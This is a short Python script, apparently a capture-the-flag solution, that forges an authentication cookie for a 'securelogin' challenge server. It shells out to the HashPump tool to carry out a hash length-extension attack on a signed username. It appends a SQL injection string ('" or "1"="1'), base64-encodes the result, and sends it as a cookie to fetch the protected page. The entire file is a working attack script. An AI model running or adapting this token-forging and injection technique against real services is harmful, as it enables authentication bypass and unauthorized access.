#!/usr/bin/env python

import requests
from base64 import *
import sys
import os

username = "rup0rt"
hash= "a2f1fce8fc9601020c4ab0932cbc52bdf57a43ba83026b86ff656c436fd9d859c"
append = '" or "1"="1'
keylen = 41

hashpump = os.popen("/home/creeq/HashPump/hashpump -s %s -d %s -a '%s' -k %i" % (hash, username, append, keylen)).readlines()
newhash = hashpump[0].rstrip().decode("string_escape")
newuser = hashpump[1].rstrip().decode("string_escape")

secret = b64encode("username=" + newuser + "-" + newhash)

url = 'http://securelogin.hackover.h4q.it/secret/'
cookies = dict(data=secret)

r = requests.get(url, cookies=cookies)
res = r.text

print res